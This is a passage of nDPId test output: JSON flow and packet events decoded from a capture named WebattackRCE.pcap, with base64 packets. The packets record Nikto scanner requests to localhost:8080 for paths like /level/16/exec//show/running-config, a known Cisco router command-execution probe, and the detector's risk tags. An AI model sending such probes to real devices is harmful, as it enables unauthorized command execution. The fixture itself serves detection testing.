00738{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_packet_id":1,"flow_last_seen":1576420277578,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":261,"pkt_l4_len":227,"thread_ts_msec":1576420277578,"pkt":"AAAAAAAAAAAAAAAACABFAAD3GI1AAEAGI3J\/AAABfwAAAcYAH5BPCyB6v01M8IAYAED+6wAAAQEICp1m\/nKdZv5yR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L3J1bm5pbmctY29uZmlnL2ludGVyZmFjZS9GYXN0RXRoZXJuZXQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI2MikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277578,"flow_last_seen":1576420277578,"flow_idle_time":7580000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"midstream":1,"thread_ts_msec":1576420277578,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50688,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/running-config\/interface\/FastEthernet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001262)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277580,"flow_last_seen":1576420277580,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277580,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_packet_id":1,"flow_last_seen":1576420277580,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277580,"pkt":"AAAAAAAAAAAAAAAACABFAADIjaNAAEAGrop\/AAABfwAAAcYCH5DxgrVTaB5HZIAYAED+vAAAAQEICp1m\/nSdZv50R0VUIC9sZXZlbC8xNi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277580,"flow_last_seen":1576420277580,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277580,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50690,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001263)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277581,"flow_last_seen":1576420277581,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277581,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_packet_id":1,"flow_last_seen":1576420277581,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277581,"pkt":"AAAAAAAAAAAAAAAACABFAADI2jFAAEAGYfx\/AAABfwAAAcYEH5BCjuLdnOtotYAYAED+vAAAAQEICp1m\/nWdZv51R0VUIC9sZXZlbC8xNy9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277581,"flow_last_seen":1576420277581,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277581,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50692,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/17\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001264)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277583,"flow_last_seen":1576420277583,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277583,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_packet_id":1,"flow_last_seen":1576420277583,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277583,"pkt":"AAAAAAAAAAAAAAAACABFAADIW7pAAEAG4HN\/AAABfwAAAcYGH5CxzGNMmxSh6IAYAED+vAAAAQEICp1m\/nedZv53R0VUIC9sZXZlbC8xOC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjY1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277583,"flow_last_seen":1576420277583,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277583,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50694,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/18\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001265)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277584,"flow_last_seen":1576420277584,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277584,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_packet_id":1,"flow_last_seen":1576420277584,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277584,"pkt":"AAAAAAAAAAAAAAAACABFAADIKRRAAEAGExp\/AAABfwAAAcYIH5CpMBHnxNoUUoAYAED+vAAAAQEICp1m\/nidZv54R0VUIC9sZXZlbC8xOS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjYpDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277584,"flow_last_seen":1576420277584,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277584,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50696,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/19\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001266)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277586,"flow_last_seen":1576420277586,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277586,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":1,"flow_last_seen":1576420277586,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277586,"pkt":"AAAAAAAAAAAAAAAACABFAADIukpAAEAGgeN\/AAABfwAAAcYKH5AiT4K97CCbIYAYAED+vAAAAQEICp1m\/nqdZv56R0VUIC9sZXZlbC8yMC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjY3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277586,"flow_last_seen":1576420277586,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277586,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50698,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/20\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001267)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277588,"flow_last_seen":1576420277588,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277588,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":1,"flow_last_seen":1576420277588,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277588,"pkt":"AAAAAAAAAAAAAAAACABFAADIUb5AAEAG6m9\/AAABfwAAAcYMH5BdL2lKom\/agYAYAED+vAAAAQEICp1m\/nydZv58R0VUIC9sZXZlbC8yMS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277588,"flow_last_seen":1576420277588,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277588,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50700,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/21\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001268)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277590,"flow_last_seen":1576420277590,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277590,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":1,"flow_last_seen":1576420277590,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277590,"pkt":"AAAAAAAAAAAAAAAACABFAADIMkhAAEAGCeZ\/AAABfwAAAcYOH5Ck4gq0tTkM3YAYAED+vAAAAQEICp1m\/n6dZv5+R0VUIC9sZXZlbC8yMi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjkpDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277590,"flow_last_seen":1576420277590,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277590,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50702,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/22\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001269)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277592,"flow_last_seen":1576420277592,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277592,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":1,"flow_last_seen":1576420277592,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277592,"pkt":"AAAAAAAAAAAAAAAACABFAADIGgdAAEAGIid\/AAABfwAAAcYQH5AVMSL0hIVMXoAYAED+vAAAAQEICp1m\/oCdZv5\/R0VUIC9sZXZlbC8yMy9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjcwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277592,"flow_last_seen":1576420277592,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277592,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50704,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/23\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001270)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277593,"flow_last_seen":1576420277593,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277593,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_packet_id":1,"flow_last_seen":1576420277593,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277593,"pkt":"AAAAAAAAAAAAAAAACABFAADI3vBAAEAGXT1\/AAABfwAAAcYSH5AD6eYZLZCITIAYAED+vAAAAQEICp1m\/oGdZv6BR0VUIC9sZXZlbC8yNC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277593,"flow_last_seen":1576420277593,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277593,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50706,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/24\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001271)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277595,"flow_last_seen":1576420277595,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277595,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":1,"flow_last_seen":1576420277595,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277595,"pkt":"AAAAAAAAAAAAAAAACABFAADIjYJAAEAGrqt\/AAABfwAAAcYUH5BJPLV3Xqa0Y4AYAED+vAAAAQEICp1m\/oOdZv6DR0VUIC9sZXZlbC8yNS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277595,"flow_last_seen":1576420277595,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277595,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50708,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/25\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001272)"}}
